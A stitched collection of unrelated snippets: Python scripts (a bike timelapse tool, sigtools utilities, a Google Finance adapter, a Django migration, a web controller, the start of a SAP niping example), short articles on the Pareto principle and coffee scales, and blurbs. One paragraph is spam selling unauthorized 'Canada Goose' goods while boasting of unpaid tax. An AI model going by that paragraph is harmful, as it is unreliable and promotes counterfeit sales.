print('=======================================')
ReMapHeaderFields()
MultiFileMarge()
print('=======================================')
print(' COMPLETED ')
print()
|
Asia is the world's largest continent, comprising an enormous wealth of languages, both in its present as well as its eventful past. This series contributes to the understanding of this linguistic variety by publishing books from different thoeretical backgrounds and different methodological approaches, dealing with at least one Asian language. By adopting a maximally integrative policy, the editors of the series hope to promote theoretical discussions whose solutions may, in turn, help to overcome the theoretical lean towards West European languages and thus provide a deeper understanding of Asian linguistic structures and of human language in general.
|
#!/usr/bin/python
"""Stitch together timelapse images with a Garmin track.
Draws graphs of Garmin data (speed, HR, cadence, elevation) along with a Google
map of position (updated every 10th of a mile). Google Maps has some very
aggressive rate limits, which means this script has to sleep _a lot_ and
frequently fail. Fortunately, files are staged, and it can pick up where it
left off.
Relies on the EXIF data from the timelapse files to match the track up with the
images.
Tested on Linux with a GoPro Hero3 and a Garmin Edge 500:
https://www.youtube.com/watch?v=Y1VTvU5xEFM
USAGE:
Do to Google Map's aggressive throttling it's best to put this in a loop.
while ! python biketl.py --fitfile=garmin_file.fit --imgsrcglob='images/gopro-source/*.JPG' --stagingdir=/tmp/temp-dir ; do sleep 5m ; done
"""
import argparse
import bisect
import datetime
import glob
import os
import sys
import tempfile
import time
import urllib2
ROOT = os.path.dirname(sys.argv[0])
sys.path.append(os.path.join(ROOT, 'python-fitparse'))
sys.path.append(os.path.join(ROOT, 'python-fitparse'))
sys.path.append(os.path.join(ROOT, 'motionless'))
sys.path.append(os.path.join(ROOT, 'exif-py'))
from fitparse import activity
from motionless import DecoratedMap, LatLonMarker
from matplotlib import pyplot
from matplotlib import font_manager
from matplotlib.pyplot import np
import EXIF
SEMICIRCLE_RATIO = 180.0/(2**31)
MS_TO_MPH_RATIO = 2.23694
METERS_TO_MILES_RATIO = 0.000621371
METERS_TO_FEET_RATIO = 3.28084
#FONT_PATH = '/home/james/code/biketl/zekton.otf'
NUM_GRAPH_POINTS=100
class ImagesAndPointsDoNotOverlap(RuntimeError):
pass
class NoImagesFound(RuntimeError):
pass
class NoGPSTrack(RuntimeError):
pass
def GetPointsFromActivity(filename):
print 'loading activity %s' % filename
a = activity.Activity(filename)
a.parse()
points = []
for record in a.get_records_by_type('record'):
points.append(Point(record))
return points
class PointList(object):
def __init__(self, fitfile):
self._points = GetPointsFromActivity(fitfile)
self._times = [point.time for point in self._points]
def __getitem__(self, index):
return self._points[index]
def __len__(self):
return len(self._points)
def GetIndexNearestTime(self, t):
if not self._points:
return None
left_index = bisect.bisect_left(self._times, t)
right_index = bisect.bisect_right(self._times, t)
left, right = None, None
if left_index >= len(self._points):
return len(self._points)
if right_index < len(self._points):
left = self._points[left_index]
right = self._points[right_index]
if (t - left.time) < (right.time - t):
return left_index
else:
return right_index
return left_index
def GetPointsNearestTime(self, t, num_points=50):
index = self.GetIndexNearestTime(t)
if index is None:
return None
return self._points[max(0, index - num_points):index+1]
class Point(object):
CONVERTER = {
'semicircles': SEMICIRCLE_RATIO,
'm/s': MS_TO_MPH_RATIO,
'm': METERS_TO_FEET_RATIO,
}
def __init__(self, record):
self._record = record
@property
def distance(self):
dist = self._record.get_data('distance')
if dist:
return dist * METERS_TO_MILES_RATIO
return 0
@property
def position(self):
return (self.position_lat, self.position_long)
@property
def temp_f(self):
return self.temperature * 9.0 / 5.0 + 32.0
def __getattr__(self, field_name):
data = self._record.get_data(field_name)
if data is None:
return 0
unit_ratio = self.CONVERTER.get(self._record.get_units(field_name), 1)
return data*unit_ratio
@property
def time(self):
return self._record.get_data('timestamp')
def __repr__(self):
return str(self)
def __str__(self):
return "Time: %s\nPos: %s\nSpeed: %s mph\nHR: %s bpm\nCAD: %s rpm\nAlt: %s feet\nGrade: %d%%\nDist: %s miles\nTemp: %s" % (
self.time.ctime(), self.position, self.speed, self.heart_rate,
self.cadence, self.altitutde, self.grade, self.distance, self.temperature)
class Image(object):
def __init__(self, filename, timeskew=0):
self.filename = filename
self.timeskew = timeskew
with open(filename, 'r') as f:
self._tags = EXIF.process_file(f)
@property
def time(self):
ts = str(self._tags['EXIF DateTimeOriginal'])
return (datetime.datetime.strptime(ts, '%Y:%m:%d %H:%M:%S') +
datetime.timedelta(0, self.timeskew, 0))
def GetImages(files, timeskew=0):
"""Load images.
Args:
files: list of filenames
timeskew: seconds to add to each EXIF timestamp
Returns:
list of Image objects, ordered by exif timestamp (ascending)
"""
print 'Loading and sorting exif data for %d image files...' % len(files)
return sorted([Image(f, timeskew=timeskew) for f in files], key=lambda i:i.time)
def GetMapForPoints(output_dir, file_basename, points, mapdelay=3):
# Map creation is expensive, so check if we've already fetched it.
map_image_fname = os.path.join(output_dir, 'map-%s.png' % file_basename)
latest = points[-1]
if os.path.exists(map_image_fname):
print 'map already exists for %s' % latest
return map_image_fname
print 'getting map for %s' % latest
gmap = DecoratedMap(size_x=200, size_y=200, pathweight=4, pathcolor='red')
gmap.add_marker(
LatLonMarker(*tuple(str(x) for x in points[-1].position), color='red'))
print 'sleeping %s seconds' % mapdelay
time.sleep(mapdelay)
resp = urllib2.urlopen(gmap.generate_url() + '&zoom=11')
f = open(map_image_fname, 'w')
f.write(resp.read())
f.close()
return map_image_fname
def DrawSpeedLabel(speed, ax):
if speed > 25:
font = font_manager.FontProperties(size=14,
weight='bold')
#fname=FONT_PATH)
else:
font = font_manager.FontProperties(size=14)
#fname=FONT_PATH)
desc = ('%.1f MPH' % speed).rjust(8)
# I dislike that pyplot is global, it impinges my customary design.
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
def DrawHeartRateLabel(hr, ax):
color = 'white'
if hr > 165:
desc = ('%d BPM' % hr).rjust(7)
font = font_manager.FontProperties(size=14, weight = 'bold')
#fname=FONT_PATH)
color = 'red'
else:
desc = 'Heart Rate (BPM)'
font = font_manager.FontProperties(size=14) #, fname=FONT_PATH)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color=color)
def GetFontPropertiesForGrade(grade):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetFontPropertiesForCadence(cadence):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetPointForLabel(points):
"""Get a point every few seconds, so that numbers are readable."""
# TODO: find the last point at a minute boundary
return points[-1]
def GetLineGraphForPoints(output_dir, file_basename, points):
"""Draw a 1024x160 graph."""
latest = GetPointForLabel(points)
figure = pyplot.figure(latest.time.ctime(), figsize=(10.24, 1), dpi=80)
# TODO: merge speed with cad on the same graph. merge hr with elevation.
ax = pyplot.subplot(1,4,1, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.subplots_adjust(left=0.05, right=1, hspace=0, wspace=0.3)
pyplot.locator_params(nbins=4)
pyplot.ylim(0, 30)
pyplot.gca().get_xaxis().set_visible(False)
DrawSpeedLabel(latest.speed, ax)
pyplot.plot([point.speed for point in points], 'g-', linewidth=2)
ax = pyplot.subplot(1,4,2, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(90, 190)
DrawHeartRateLabel(latest.heart_rate, ax)
pyplot.plot([point.heart_rate for point in points], 'r-', linewidth=2)
ax = pyplot.subplot(1,4,3, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 180)
#desc = ('%d RPM' % latest.cadence).rjust(7)
desc = 'Cadence (RPM)'
font = GetFontPropertiesForCadence(latest.cadence)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.plot([point.cadence for point in points], color='#ffff00', linewidth=2)
ax = pyplot.subplot(1,4,4, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 500) # STP max elevation is 500ft
# TODO: flash the value in bold whenever VAM is > some ft per min.
# e.g. crossing every 100 feet for the first time in a while.
#desc = ('%d feet' % latest.altitude).rjust(11)
desc = 'Elevation (Feet)'
font = GetFontPropertiesForGrade(latest.grade) # XXX: grade is always 0?
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.gca().get_xaxis().set_visible(False)
pyplot.plot([point.altitude for point in points], 'c-', linewidth=2)
graph_image_fname = os.path.join(output_dir, 'graph-%s.png' % file_basename)
print 'generating graph %s' % graph_image_fname
pyplot.savefig(graph_image_fname, facecolor='black')
return graph_image_fname
def Run(cmd_str, log=None):
if log:
print '%s:\n %s' % (log, cmd_str)
print 'composing picture and map: %s' % cmd_str
if os.system(cmd_str) != 0:
raise RuntimeError('command "%s" failed' % cmd_str)
def CompositeImages(pic_fname, gmap_fname, graph_fname, msg_bar_str, output_fname):
"""Assumes:
- 4:3 pic
- 300x300 map
- 1024x160 graph
- 1024x768 output
"""
# Resize the image down
tmpfile = '/tmp/img-and-map.png'
cmd_str = 'convert -scale 1024x768 %s %s' % (pic_fname, tmpfile)
Run(cmd_str, log='scaling image down')
# Composite the resized picture and the map
cmd_str = 'composite -geometry +797+0 -dissolve 80 %s %s %s' % (
gmap_fname, tmpfile, tmpfile)
Run(cmd_str, log='composing picture and map')
# Add status bar (mileage and time)
cmd_str = ('convert %s '
'-fill "#0008" '
'-draw "rectangle 0,630,1024,665" '
'-fill "#cccccc" '
#'-font %s '
'-pointsize 24 '
'-annotate +10+655 "%s" '
'%s') % (tmpfile, #FONT_PATH,
msg_bar_str, tmpfile)
Run(cmd_str, log='adding status bar (mileage and time)')
# Composite the tempfile with the graph
cmd_str = 'composite -geometry +0+665 -dissolve 50 %s %s %s' % (
graph_fname, tmpfile, output_fname)
Run(cmd_str, log='composing graph and prev composition')
def GetOutputImagePath(output_dir, pic_fname):
return os.path.join(output_dir, 'merged-%s' % os.path.basename(pic_fname))
def CheckImagesAndPointsOverlap(images, pointlist):
"""Verify that points exist for the camera's time, fail otherwise."""
if not len(images):
raise NoImagesFound()
if not len(pointlist):
raise NoGPSTrack('GPS track has 0 points.')
if images[-1].time < pointlist[0].time:
raise ImagesAndPointsDoNotOverlap('Last image occurs before first GPS point.')
if images[0].time > pointlist[-1].time:
raise ImagesAndPointsDoNotOverlap('First image occurs after last GPS point.')
def main():
parser = argparse.ArgumentParser(
description='Timelapse from Garmin bike records.')
parser.add_argument('--timeskew',
help='Add (or subtract) seconds from each EXIF timestamp.',
default=0)
parser.add_argument('--imgsrcglob', help='Image source glob pattern.',
default='/mnt/james/images/2013/gopro-flaming-geyser/*.JPG')
parser.add_argument('--stagingdir', help='Directory to stage files.',
default='/home/james/tmp/flaming-geyser-output')
parser.add_argument('--fitfile', help='Path to the source Garmin .fit file.',
default='/home/james/garmin/2013-06-22-07-05-20.fit')
parser.add_argument('--loop', help='Iterate over all files.', dest='loop',
action='store_true', default=True)
parser.add_argument('--noloop', help='Iterate over all files.', dest='loop',
action='store_false', default=False)
parser.add_argument('--mapdelay',
help='Number of seconds to sleep afer fetching a map.', default=5)
flags = parser.parse_args()
pointlist = PointList(flags.fitfile)
total_distance = pointlist[-1].distance
if not os.path.exists(flags.stagingdir):
print 'making %s' % flags.stagingdir
os.makedirs(flags.stagingdir)
images = GetImages(glob.glob(flags.imgsrcglob), flags.timeskew)
CheckImagesAndPointsOverlap(images, pointlist)
prev_point = None
map_image_fname = None
for image in images:
output_image_path = GetOutputImagePath(flags.stagingdir, image.filename)
# Check if we've already rendered an image based on this source image.
if os.path.exists(output_image_path):
print 'skipping %s' % image.filename
continue
print 'processing %s' % image.filename
# Get the previous N points
points = pointlist.GetPointsNearestTime(image.time, num_points=NUM_GRAPH_POINTS)
latest_point = points[-1]
# Get a graph
img_basename = os.path.basename(image.filename).replace('.JPG', '')
graph_image_fname = GetLineGraphForPoints(flags.stagingdir, img_basename, points)
# Map creation is expensive, so only get a new map if we've moved.
if (map_image_fname
and prev_point
and ('%.1f' % prev_point.distance) == ('%.1f' % latest_point.distance)):
print 'distance unchanged, using last map'
else:
# Get a map
map_image_fname = GetMapForPoints(flags.stagingdir, img_basename, points,
mapdelay=flags.mapdelay)
# Put them all together
elapsed_timedelta = latest_point.time - pointlist[0].time
elapsed_str = ':'.join(str(elapsed_timedelta).split(':')[:2])
msg_bar_str = 'Distance: %.1f miles (%.1f miles to go) Time: %s (%s elapsed) Temp: %dF' % (
latest_point.distance,
total_distance - latest_point.distance,
latest_point.time.strftime('%l:%M %P'),
elapsed_str,
latest_point.temp_f)
CompositeImages(image.filename, map_image_fname, graph_image_fname,
msg_bar_str, output_image_path)
prev_point = latest_point
if not flags.loop:
print 'exiting after one iteration'
sys.exit(0)
# make a movie:
# mencoder "mf://merged-*.JPG" -mf fps=12 -o output.avi -ovc lavc -lavcopts vcodec=mpeg4:mbd=2:trell:vbitrate=7000
if __name__ == '__main__':
main()
|
The 80 20 Rule is a fantastic tool you can use to increase your productivity and well-being. It can help you to identify the areas of your life which are responsible for your major successes, and it can also aid you by pointing out which parts of your life are causing most of your problems.
It’s so simple to apply the 80 20 rule too. You will be able to complete the exercises in this article in about ten minutes, ending up with a surprisingly accurate overview of what’s causing the good and bad in your life – with action points so you can implement changes and progress. Basically, the aim is to do more of the stuff that makes you happy, and less of the stuff that makes you stressed.
Before we get into that though, here’s a bit of background on the origins of the rule – also known as the “Pareto Principle”, the “Law of the Vital Few”, and “Pareto’s Law”.
Vilfredo Pareto was a controversial Italian economist and sociologist, whose best-known achievement was the discovery of the 80 20 rule.
Pareto realised that 80% of the wealth in Italy was concentrated in the hands of just 20% of the people. Intrigued, he applied this formula to other countries’ economies – and saw that the 80 20 principle applied to their economies too.
Presumably, dear old Vilfredo was a little shocked when he discovered that the 80 20 rule not only applied to economics, but to his garden too... Dear old Vilfredo liked to plant peas in his garden, you see, and he stumbled across the fact that 80% of the peas sprouted from just 20% of the peapods he planted. With this little anomaly, the 80 20 rule was born.
Since Pareto’s time, more and more people have found that their lives and businesses are governed by the 80 20 rule. Microsoft, for example, realised that by fixing the top 20% of the most reported bugs, 80% percent of the errors and crashes were eliminated from Windows.
Salespeople realise that 80% of their sales often come from just 20% of their clients, and focus their time on this 20% accordingly. You probably inadvertently use the 80 20 principle too – it’s likely that you wear your favourite 20% items of clothing up to 80% of the time... be honest now!
come from approximately 20% of the causes.
This means that if 80% of your results come from 20% of your actions - and you can identify those actions - it is possible to improve your results and become more productive, by simply doing more of these actions.
Equally, if 80% of your problems come from 20% of your activities or beliefs, you can isolate them and stop doing them.
Here are 7 questions that will help you to understand how the 80 20 rule operates in your life – and allow you to make changes so you get more of the good stuff, and less of the bad.
If you take a few minutes to answer these questions honestly, you’re likely to have a remarkably simple - yet accurate - overview of what’s good and bad in your life.
My recommendation is to answer all the questions, and then create an Action Point for each. After all, knowledge is of limited value without action.
For example, if your answer to question 3 is “The 20% of my work activities that are causing 80% of my work results are pitching, being tenacious and not giving up”, then the action point would be to ensure that you spend more time pitching, being tenacious, and not giving up!
Equally, if your answer to number 6 is “The 20% of my skills that are causing 80% of my success are my charm, interpersonal skills and confidence”, then you could create an action plan to get a job that emphasises these qualities and allows you to use them more of the time... Simple!
Sometimes, just having this kind of clarity will allow you to make the changes you desire. At the very least, this knowledge will ensure that you have a deeper understanding of what makes you tick, and will point out the areas that you should focus on to be more productive and get better results.
(1) Which 20% of activities are causing 80% of my happiness?
(2) Which 20% of activities are causing 80% of my stresses?
(3) Which 20% of work activities are causing 80% of my work results?
(4) Which 20% of my friends are contributing to 80% of my fun?
(5) Which 20% of my friends are contributing to 80% of my issues?
(6) Which 20% of my skills and qualities are responsible for 80% of my success?
(7) Which 20% of my beliefs are responsible for 80% of my tribulations?
By answering these questions honestly, you’ll have an overview of the things you do that make you happy – and the things you do that make you sad. You’ll realise what to focus on at work to make yourself more productive. You’ll know which of your friends are affirming your beliefs and aspirations – and you might know which of your friends you’ll have to have a quiet word with to explain how they make you feel. Finally, you’ll identify which of your skills and qualities are contributing most to your success, and you’ll have isolated some self-limiting beliefs.
Not bad for 10 minutes ay?
Try and play with the 80 20 rule in your life. It’s a remarkably effective way to become more productive, and it helps you to be happier too. All that’s left to say is a big old “thank you” to Vilfredo... and good luck!
|
# sigtools - Collection of Python modules for manipulating function signatures
# Copyright (c) 2013-2015 Yann Kaiser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import inspect
import ast
from functools import update_wrapper, partial
from weakref import WeakKeyDictionary
def get_funcsigs():
import inspect
try:
inspect.signature
except AttributeError:
import funcsigs
return funcsigs
else:
return inspect
funcsigs = get_funcsigs()
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
OrderedDict # quiet pyflakes
class _Unset(object):
__slots__ = ()
def __repr__(self):
return '<unset>'
UNSET = _Unset()
del _Unset
def noop(func):
return func
def qualname(obj):
try:
return obj.__qualname__
except AttributeError:
try:
return '{0.__module__}.{0.__name__}'.format(obj)
except AttributeError:
return repr(obj)
class OverrideableDataDesc(object):
def __init__(self, *args, **kwargs):
original = kwargs.pop('original', None)
if original is not None:
update_wrapper(self, original)
try:
self.custom_getter = kwargs.pop('get')
except KeyError:
def cg(func, **kwargs):
kwargs.update(self.parameters())
return type(self)(func, **kwargs)
self.custom_getter = cg
self.insts = WeakKeyDictionary()
super(OverrideableDataDesc, self).__init__(*args, **kwargs)
def __get__(self, instance, owner):
try:
getter = type(self.func).__get__
except AttributeError:
return self
else:
func = getter(self.func, instance, owner)
try:
return self.insts[func]
except KeyError:
pass
if func is self.func:
ret = self
else:
ret = self.custom_getter(func, original=self)
self.insts[func] = ret
return ret
def safe_get(obj, instance, owner):
try:
get = type(obj).__get__
except (AttributeError, KeyError):
return obj
return get(obj, instance, owner)
def iter_call(obj):
while True:
yield obj
try:
obj = obj.__call__
obj.__code__.co_filename
# raises if this is the __call__ method of a builtin object
except AttributeError:
return
partial_ = partial
partial_ = partial
def get_introspectable(obj, forged=True, af_hint=True, partial=True):
for obj in iter_call(obj):
try:
obj.__signature__
return obj
except AttributeError:
pass
if forged:
try:
obj._sigtools__forger
return obj
except AttributeError:
pass
if af_hint:
try:
obj._sigtools__autoforwards_hint
return obj
except AttributeError:
pass
if partial:
if isinstance(obj, partial_):
return obj
return obj
def get_ast(func):
try:
code = func.__code__
except AttributeError:
return None
try:
rawsource = inspect.getsource(code)
except (OSError, IOError):
return None
source = inspect.cleandoc('\n' + rawsource)
module = ast.parse(source)
return module.body[0]
|
Accurately weighed coffee is one of the most important parts of brewing filter coffee at home. Traditionally coffee scoops have been used at home to measure out coffee grounds, but increasingly people are choosing to grind at home, and using a scoop can lead to inconsistent brewing recipes. Weighing scales are a great alternative to measure whole coffee beans before they are ground, and will help you control your recipe and ultimately give you a more consistent cup of coffee.
Hario offer a pair of scales that are a perfect complement to your coffee brewing ritual. Both feature 0.1g accuracy, the ability to tare and an integrated timer to help craft your perfect brew.
What's wrong with my kitchen scales?
If you have traditional kitchen scales (i.e. not digital) then quite simply they will not be accurate enough.
If you do have a set of digital kitchen scales, they will typically not be sufficiently accurate as they are used for much larger volumes of ingredients where the margin of error is more forgiving. When weighing coffee, however, a margin of error of 2 grams in a 17 gram dose could lead to a swing either way of over 10% - quite a big difference when you're trying to stick to a consistent recipe.
|
import arrow
from ...assets import asset_factory, Option
from ...quotes import OptionQuote, Quote
from .QuoteAdapter import QuoteAdapter
from googlefinance import getQuotes
"""
Get current prices from Google Finance
"""
class GoogleFinanceQuoteAdapter(QuoteAdapter):
def __init__(self):
self._cache = {}
def _set_cache(self, quote):
self._cache[quote.asset.symbol] = quote
return quote
def get_quote(self, asset):
asset = asset_factory(asset)
if self._cache.get(asset.symbol) is not None:
return self._cache.get(asset.symbol)
if isinstance(asset, Option):
options = self.get_options(asset.underlying, asset.expiration_date)
matches = [_ for _ in options if _.asset == asset]
if len(matches) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return matches[0]
else:
google_quotes = getQuotes(asset.symbol)
if google_quotes is None or len(google_quotes) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
last_trade = google_quotes[0].get('LastTradeWithCurrency', None)
if last_trade is None or last_trade == '' or last_trade == '-':
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return Quote(quote_date=arrow.now().format('YYYY-MM-DD'), asset=asset, bid=float(last_trade)-0.01, ask=float(last_trade)+0.01)
def get_expiration_dates(self, underlying_asset=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
return sorted(list(set([asset_factory(_['s']).expiration_date for _ in (oc.calls + oc.puts)])))
def get_options(self, underlying_asset=None, expiration_date=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
underlying_quote = self.get_quote(underlying_asset)
out = []
for option in (oc.calls + oc.puts):
if arrow.get(expiration_date).format('YYMMDD') in option['s']:
quote = OptionQuote(quote_date=arrow.now().format('YYYY-MM-DD'),
asset=option['s'],
bid=float(option['b']) if option['b'] != '-' else None,
ask=float(option['a']) if option['a'] != '-' else None,
underlying_price = underlying_quote.price)
self._set_cache(quote)
out.append(quote)
return out
# the code below is from https://github.com/makmac213/python-google-option-chain
import requests
OPTION_CHAIN_URL = 'https://www.google.com/finance/option_chain'
class OptionChain(object):
def __init__(self, q):
"""
Usage:
from optionchain import OptionChain
oc = OptionChain('NASDAQ:AAPL')
# oc.calls
# oc.puts
"""
params = {
'q': q,
'output': 'json'
}
data = self._get_content(OPTION_CHAIN_URL, params)
# get first calls and puts
calls = data['calls']
puts = data['puts']
for (ctr, exp) in enumerate(data['expirations']):
# we already got the first put and call
# skip first
if ctr:
params['expd'] = exp['d']
params['expm'] = exp['m']
params['expy'] = exp['y']
new_data = self._get_content(OPTION_CHAIN_URL, params)
if new_data.get('calls') is not None:
calls += new_data.get('calls')
if new_data.get('puts') is not None:
puts += new_data.get('puts')
self.calls = calls
self.puts = puts
def _get_content(self, url, params):
response = requests.get(url, params=params)
if response.status_code == 200:
content_json = response.content
data = json_decode(content_json)
return data
import json
import token, tokenize
from io import StringIO
# using below solution fixes the json output from google
# http://stackoverflow.com/questions/4033633/handling-lazy-json-in-python-expecting-property-name
def fixLazyJson (in_text):
tokengen = tokenize.generate_tokens(StringIO(in_text.decode('ascii')).readline)
result = []
for tokid, tokval, _, _, _ in tokengen:
# fix unquoted strings
if (tokid == token.NAME):
if tokval not in ['true', 'false', 'null', '-Infinity', 'Infinity', 'NaN']:
tokid = token.STRING
tokval = u'"%s"' % tokval
# fix single-quoted strings
elif (tokid == token.STRING):
if tokval.startswith ("'"):
tokval = u'"%s"' % tokval[1:-1].replace ('"', '\\"')
# remove invalid commas
elif (tokid == token.OP) and ((tokval == '}') or (tokval == ']')):
if (len(result) > 0) and (result[-1][1] == ','):
result.pop()
# fix single-quoted strings
elif (tokid == token.STRING):
if tokval.startswith ("'"):
tokval = u'"%s"' % tokval[1:-1].replace ('"', '\\"')
result.append((tokid, tokval))
return tokenize.untokenize(result)
def json_decode(json_string):
try:
ret = json.loads(json_string)
except:
json_string = fixLazyJson(json_string)
ret = json.loads(json_string)
return ret
|
by Josep Lluís Mateo, Ministerio de Fomento y COAC. Barcelona, 1998.
Survey on Josep Lluís Mateo by Col·legi d’Arquitectes de Catalunya and Ministerio de Fomento. About his projects in the Netherlands and Germany as well as the architect’s native Barcelona; also includes his partnership with Marta Cervello (as MAP Architects). Essays by Aaron Betsky, Maurici Pla, Jos Bosmann, Claes Caldenby, Jaume Avellaneda and Markus Lauber; interview with Vittorio Magnago Lampugnani; biographical sketch and bibliography at rear.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-20 03:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20170624_0048'),
]
operations = [
migrations.AddField(
model_name='subscription',
name='paid',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='pago'),
),
migrations.AlterField(
model_name='column',
name='subscription_name',
field=models.CharField(choices=[('name', 'name'), ('email', 'email'), ('name_for_bib_number', 'name_for_bib_number'), ('gender', 'gender'), ('date_of_birth', 'date_of_birth'), ('city', 'city'), ('team', 'team'), ('shirt_size', 'shirt_size'), ('modality', 'modality'), ('ignore', 'ignore'), ('paid', 'paid')], max_length=20, verbose_name='coluna'),
),
migrations.AlterField(
model_name='modality',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
migrations.AlterField(
model_name='subscription',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
]
|
It is best place to buy Canada Goose Outlet online,Cheap Canada Goose Parkas,Jackets Sale Store.All Canada Goose are Unauthorized Authentic original,They are never officially contracted by these companies to be made. All are usually made in the same factories, with the same materials, and the same workers that make the official retail pairs. but we not pay any tax, that is why so cheap!
|
#!/usr/bin/env python
"""
fla.gr controller for deleting flags
For more information, see: https://github.com/JoshAshby/
http://xkcd.com/353/
Josh Ashby
2013
http://joshashby.com
joshuaashby@joshashby.com
"""
from seshat.route import autoRoute
from utils.baseHTMLObject import baseHTMLObject
from views.flags.flagDelTmpl import flagDelTmpl
import models.couch.flag.flagModel as fm
import models.couch.flag.collections.userPublicFlagsCollection as pubfc
import models.couch.flag.collections.userFlagsCollection as fc
import utils.search.searchUtils as su
@autoRoute()
class flagsDelete(baseHTMLObject):
_title = "delete flag"
__login__ = True
def GET(self):
"""
"""
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
view = flagDelTmpl(searchList=[self.tmplSearchList])
view.flag = flag
return view
def POST(self):
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
pubFlags = pubfc.userPublicFlagsCollection(self.session.id)
privFlags = fc.userFlagsCollection(self.session.id)
if flag.visibility:
pubFlags.delObject(flag.id)
privFlags.delObject(flag.id)
flag.delete()
su.updateSearch()
self.session.pushAlert("Flag `%s` deleted" % flag.title, "Bye!", "warning")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
|
Have a group of 6+? Book our Kitchen Studio just for you group or we can come to you. Call us at (978) 969-6088 to learn more.
|
#!/usr/bin/env python2
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# The library was designed and developed by Martin Gallo from
# the SecureAuth's Innovation Labs team.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# ==============
# Standard imports
import logging
from datetime import datetime
from argparse import ArgumentParser
from socket import socket, SHUT_RDWR, error as SocketError
# External imports
from scapy.packet import Raw
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPNI import SAPNIStreamSocket
from pysap.SAPRouter import SAPRoutedStreamSocket
# Set the verbosity to 0
conf.verb = 0
# Command line options parser
def parse_options():
description = "This script is an example implementation of SAP's niping utility."
usage = "%(prog)s [options] [mode] -H <remote host>"
parser = ArgumentParser(usage=usage, description=description, epilog=pysap.epilog)
mode = parser.add_argument_group("Running mode")
mode.add_argument("-s", "--start-server", dest="server", action="store_true",
help="Start server")
mode.add_argument("-c", "--start-client", dest="client", action="store_true",
help="Start client")
target = parser.add_argument_group("Target")
target.add_argument("-H", "--host", dest="host", help="Host")
target.add_argument("-S", "--port", dest="port", type=int, default=3298,
help="Port [%(default)d]")
target.add_argument("--route-string", dest="route_string",
